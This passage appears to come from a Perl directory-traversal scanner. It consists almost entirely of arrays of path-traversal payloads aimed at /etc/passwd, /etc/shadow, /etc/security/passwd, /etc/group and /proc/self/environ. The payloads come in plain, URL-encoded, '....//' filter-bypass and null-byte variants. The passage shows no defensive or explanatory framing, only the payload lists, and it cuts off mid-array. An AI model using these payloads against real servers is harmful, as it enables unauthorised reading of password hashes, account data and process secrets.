  480. "....//....//....//....//....//etc/security/user",
  481. "....//....//....//....//....//....//etc/security/user",
  482. "....//....//....//....//....//....//....//etc/security/user",
  483. "....//....//....//....//....//....//....//....//etc/security/user",
  484. "....//....//....//....//....//....//....//....//....//etc/security/user",
  485. "....//....//....//....//....//....//....//....//....//....//etc/security/user",
  486. "....//etc/security/user%00",
  487. "....//....//etc/security/user%00",
  488. "....//....//....//etc/security/user%00",
  489. "....//....//....//....//etc/security/user%00",
  490. "....//....//....//....//....//etc/security/user%00",
  491. "....//....//....//....//....//....//etc/security/user%00",
  492. "....//....//....//....//....//....//....//etc/security/user%00",
  493. "....//....//....//....//....//....//....//....//etc/security/user%00",
  494. "....//....//....//....//....//....//....//....//....//etc/security/user%00",
  495. "....//....//....//....//....//....//....//....//....//....//etc/security/user%00");
  496. ###################################################################
  497. ###################################################################
  498. @SecurityPasswd = ("/etc/security/passwd",
  499. "../etc/security/passwd",
  500. "../../etc/security/passwd",
  501. "../../../etc/security/passwd",
  502. "../../../../etc/security/passwd",
  503. "../../../../../etc/security/passwd",
  504. "../../../../../../etc/security/passwd",
  505. "../../../../../../../etc/security/passwd",
  506. "../../../../../../../../etc/security/passwd",
  507. "../../../../../../../../../etc/security/passwd",
  508. "../../../../../../../../../../etc/security/passwd",
  509. "/etc/security/passwd%00",
  510. "../etc/security/passwd%00",
  511. "../../etc/security/passwd%00",
  512. "../../../etc/security/passwd%00",
  513. "../../../../etc/security/passwd%00",
  514. "../../../../../etc/security/passwd%00",
  515. "../../../../../../etc/security/passwd%00",
  516. "../../../../../../../etc/security/passwd%00",
  517. "../../../../../../../../etc/security/passwd%00",
  518. "../../../../../../../../../etc/security/passwd%00",
  519. "../../../../../../../../../../etc/security/passwd%00",
  520. "%2Fetc%2Fsecurity%2Fpasswd",
  521. "..%2Fetc%2Fsecurity%2Fpasswd",
  522. "..%2F..%2Fetc%2Fsecurity%2Fpasswd",
  523. "..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd",
  524. "..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd",
  525. "..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd",
  526. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd",
  527. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd",
  528. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd",
  529. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd",
  530. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd",
  531. "%2Fetc%2Fsecurity%2Fpasswd%00",
  532. "..%2Fetc%2Fsecurity%2Fpasswd%00",
  533. "..%2F..%2Fetc%2Fsecurity%2Fpasswd%00",
  534. "..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00",
  535. "..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00",
  536. "..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00",
  537. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00",
  538. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00",
  539. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00",
  540. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00",
  541. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fpasswd%00",
  542. "....%2F%2Fetc/security/passwd",
  543. "....%2F%2F....%2F%2Fetc/security/passwd",
  544. "....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd",
  545. "....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd",
  546. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd",
  547. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd",
  548. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd",
  549. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd",
  550. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd",
  551. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd",
  552. "....%2F%2Fetc/security/passwd%00",
  553. "....%2F%2F....%2F%2Fetc/security/passwd%00",
  554. "....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00",
  555. "....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00",
  556. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00",
  557. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00",
  558. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00",
  559. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00",
  560. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00",
  561. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/passwd%00",
  562. "....//etc/security/passwd",
  563. "....//....//etc/security/passwd",
  564. "....//....//....//etc/security/passwd",
  565. "....//....//....//....//etc/security/passwd",
  566. "....//....//....//....//....//etc/security/passwd",
  567. "....//....//....//....//....//....//etc/security/passwd",
  568. "....//....//....//....//....//....//....//etc/security/passwd",
  569. "....//....//....//....//....//....//....//....//etc/security/passwd",
  570. "....//....//....//....//....//....//....//....//....//etc/security/passwd",
  571. "....//....//....//....//....//....//....//....//....//....//etc/security/passwd",
  572. "....//etc/security/passwd%00",
  573. "....//....//etc/security/passwd%00",
  574. "....//....//....//etc/security/passwd%00",
  575. "....//....//....//....//etc/security/passwd%00",
  576. "....//....//....//....//....//etc/security/passwd%00",
  577. "....//....//....//....//....//....//etc/security/passwd%00",
  578. "....//....//....//....//....//....//....//etc/security/passwd%00",
  579. "....//....//....//....//....//....//....//....//etc/security/passwd%00",
  580. "....//....//....//....//....//....//....//....//....//etc/security/passwd%00",
  581. "....//....//....//....//....//....//....//....//....//....//etc/security/passwd%00");
  582. ###################################################################
  583. ###################################################################
  584. @SecurityGroup =("/etc/security/group",
  585. "../etc/security/group",
  586. "../../etc/security/group",
  587. "../../../etc/security/group",
  588. "../../../../etc/security/group",
  589. "../../../../../etc/security/group",
  590. "../../../../../../etc/security/group",
  591. "../../../../../../../etc/security/group",
  592. "../../../../../../../../etc/security/group",
  593. "../../../../../../../../../etc/security/group",
  594. "../../../../../../../../../../etc/security/group",
  595. "/etc/security/group%00",
  596. "../etc/security/group%00",
  597. "../../etc/security/group%00",
  598. "../../../etc/security/group%00",
  599. "../../../../etc/security/group%00",
  600. "../../../../../etc/security/group%00",
  601. "../../../../../../etc/security/group%00",
  602. "../../../../../../../etc/security/group%00",
  603. "../../../../../../../../etc/security/group%00",
  604. "../../../../../../../../../etc/security/group%00",
  605. "../../../../../../../../../../etc/security/group%00",
  606. "%2Fetc%2Fsecurity%2Fgroup",
  607. "..%2Fetc%2Fsecurity%2Fgroup",
  608. "..%2F..%2Fetc%2Fsecurity%2Fgroup",
  609. "..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup",
  610. "..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup",
  611. "..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup",
  612. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup",
  613. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup",
  614. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup",
  615. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup",
  616. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup",
  617. "%2Fetc%2Fsecurity%2Fgroup%00",
  618. "..%2Fetc%2Fsecurity%2Fgroup%00",
  619. "..%2F..%2Fetc%2Fsecurity%2Fgroup%00",
  620. "..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00",
  621. "..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00",
  622. "..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00",
  623. "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00",
  624. "..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00",
  625. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00",
  626. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00",
  627. "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fsecurity%2Fgroup%00",
  628. "%2F%2Fetc/security/group",
  629. "....%2F%2Fetc/security/group",
  630. "....%2F%2F....%2F%2Fetc/security/group",
  631. "....%2F%2F....%2F%2F....%2F%2Fetc/security/group",
  632. "....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group",
  633. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group",
  634. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group",
  635. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group",
  636. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group",
  637. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group",
  638. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group",
  639. "%2F%2Fetc/security/group%00",
  640. "....%2F%2Fetc/security/group%00",
  641. "....%2F%2F....%2F%2Fetc/security/group%00",
  642. "....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00",
  643. "....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00",
  644. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00",
  645. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00",
  646. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00",
  647. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00",
  648. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00",
  649. "....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/security/group%00",
  650. "//etc/security/group",
  651. "....//etc/security/group",
  652. "....//....//etc/security/group",
  653. "....//....//....//etc/security/group",
  654. "....//....//....//....//etc/security/group",
  655. "....//....//....//....//....//etc/security/group",
  656. "....//....//....//....//....//....//etc/security/group",
  657. "....//....//....//....//....//....//....//etc/security/group",
  658. "....//....//....//....//....//....//....//....//etc/security/group",
  659. "....//....//....//....//....//....//....//....//....//etc/security/group",
  660. "....//....//....//....//....//....//....//....//....//....//etc/security/group",
  661. "//etc/security/group%00",
  662. "....//etc/security/group%00",
  663. "....//....//etc/security/group%00",
  664. "....//....//....//etc/security/group%00",
  665. "....//....//....//....//etc/security/group%00",
  666. "....//....//....//....//....//etc/security/group%00",
  667. "....//....//....//....//....//....//etc/security/group%00",
  668. "....//....//....//....//....//....//....//etc/security/group%00",
  669. "....//....//....//....//....//....//....//....//etc/security/group%00",
  670. "....//....//....//....//....//....//....//....//....//etc/security/group%00",
  671. "....//....//....//....//....//....//....//....//....//....//etc/security/group%00");
  672. ######################################################################
  673. ######################################################################
  674. @ALL = ("/etc/passwd","../etc/passwd","../../etc/passwd","../../../etc/passwd","../../../../etc/passwd","../../../../../etc/passwd","../../../../../../etc/passwd","../../../../../../../etc/passwd","../../../../../../../../etc/passwd","../../../../../../../../../etc/passwd","../../../../../../../../../../etc/passwd","/etc/passwd%00","../etc/passwd%00","../../etc/passwd%00","../../../etc/passwd%00","../../../../etc/passwd%00","../../../../../etc/passwd%00","../../../../../../etc/passwd%00","../../../../../../../etc/passwd%00","../../../../../../../../etc/passwd%00","../../../../../../../../../etc/passwd%00","../../../../../../../../../../etc/passwd%00","....//etc/passwd","....//....//etc/passwd","....//....//....//etc/passwd","....//....//....//....//etc/passwd","....//....//....//....//....//etc/passwd","....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//etc/passwd","....//....//....//....//....//....//....//....//....//....//etc/passwd","....//etc/passwd%00","....//....//etc/passwd%00","....//....//....//etc/passwd%00","....//....//....//....//etc/passwd%00","....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//etc/passwd%00","....//....//....//....//....//....//....//....//....//....//etc/passwd%00","%2Fetc%2Fpasswd","..%2Fetc%2Fpasswd","..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","%2Fetc%2Fpasswd%00","..%2Fetc%2Fpasswd%00","..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00","....%2f%2Fetc/passwd","....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd","....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/passwd%00","/proc/self/environ","../proc/self/environ","../../proc/self/environ","../../../proc/self/environ","../../../../proc/self/environ","../../../../../proc/self/environ","../../../../../../proc/self/environ","../../../../../../../proc/self/environ","../../../../../../../../proc/self/environ","../../../../../../../../../proc/self/environ","../../../../../../../../../../proc/self/environ","/proc/self/environ%00","../proc/self/environ%00","../../proc/self/environ%00","../../../proc/self/environ%00","../../../../proc/self/environ%00","../../../../../proc/self/environ%00","../../../../../../proc/self/environ%00","../../../../../../../proc/self/environ%00","../../../../../../../../proc/self/environ%00","../../../../../../../../../proc/self/environ%00","../../../../../../../../../../proc/self/environ%00","%2Fproc%2Fself%2Fenviron","..%2Fproc%2Fself%2Fenviron","..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron","%2Fproc%2Fself%2Fenviron%00","..%2Fproc%2Fself%2Fenviron%00","..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron%00","//proc/self/environ","....//proc/self/environ","....//....//proc/self/environ","....//....//....//proc/self/environ","....//....//....//....//proc/self/environ","....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//proc/self/environ","....//....//....//....//....//....//....//....//....//....//proc/self/environ","//proc/self/environ%00","....//proc/self/environ%00","....//....//proc/self/environ%00","....//....//....//proc/self/environ%00","....//....//....//....//proc/self/environ%00","....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//proc/self/environ%00","....//....//....//....//....//....//....//....//....//....//proc/self/environ%00","%2f%2Fproc/self/environ","....%2f%2Fproc/self/environ","....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ","%2f%2Fproc/self/environ%00","....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fproc/self/environ%00","/etc/shadow","../etc/shadow","../../etc/shadow","../../../etc/shadow","../../../../etc/shadow","../../../../../etc/shadow","../../../../../../etc/shadow","../../../../../../../etc/shadow","../../../../../../../../etc/shadow","../../../../../../../../../etc/shadow","../../../../../../../../../../etc/shadow","/etc/shadow%00","../etc/shadow%00","../../etc/shadow%00","../../../etc/shadow%00","../../../../etc/shadow%00","../../../../../etc/shadow%00","../../../../../../etc/shadow%00","../../../../../../../etc/shadow%00","../../../../../../../../etc/shadow%00","../../../../../../../../../etc/shadow%00","../../../../../../../../../../etc/shadow%00","%2Fetc..%2Fshadow","..%2Fetc%2Fshadow","..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow","%2Fetc..%2Fshadow%00","..%2Fetc%2Fshadow%00","..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow%00","%2F%2Fetc/shadow","....%2f%2Fetc/shadow","....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow","%2F%2Fetc/shadow%00","....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2F....%2f%2Fetc/shadow%00","....//etc/shadow","....//....//etc/shadow","....//....//....//etc/shadow","....//....//....//....//etc/shadow","....//....//....//....//....//etc/shadow","....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//etc/shadow","....//....//....//....//....//....//....//....//....//....//etc/shadow","....//etc/shadow%00","....//....//etc/shadow%00","....//....//....//etc/shadow%00","....//....//....//....//etc/shadow%00","....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//etc/shadow%00","....//....//....//....//....//....//....//....//....//....//etc/shadow%00","/etc/group","../etc/group","../../etc/group","../../../etc/group","../../../../etc/group","../../../../../etc/group","../../../../../../etc/group","../../../../../../../etc/group","../../../../../../../../etc/group","../../../../../../../../../etc/group","../../../../../../../../../../etc/group","/etc/group%00","../etc/group%00","../../etc/group%00","../../../etc/group%00","../../../../etc/group%00","../../../../../etc/group%00","../../../../../../etc/group%00","../../../../../../../etc/group%00","../../../../../../../../etc/group%00","../../../../../../../../../etc/group%00","../../../../../../../../../../etc/group%00","%2Fetc..%2Fgroup","..%2Fetc%2Fgroup","..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup","%2Fetc%2Fgroup%00","..%2Fetc%2Fgroup%00","..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fgroup%00","%2F%2Fetc/group","....%2F%2Fetc/group","....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc/group","....%2F%2F....%2F%2F....%2F%2F....%2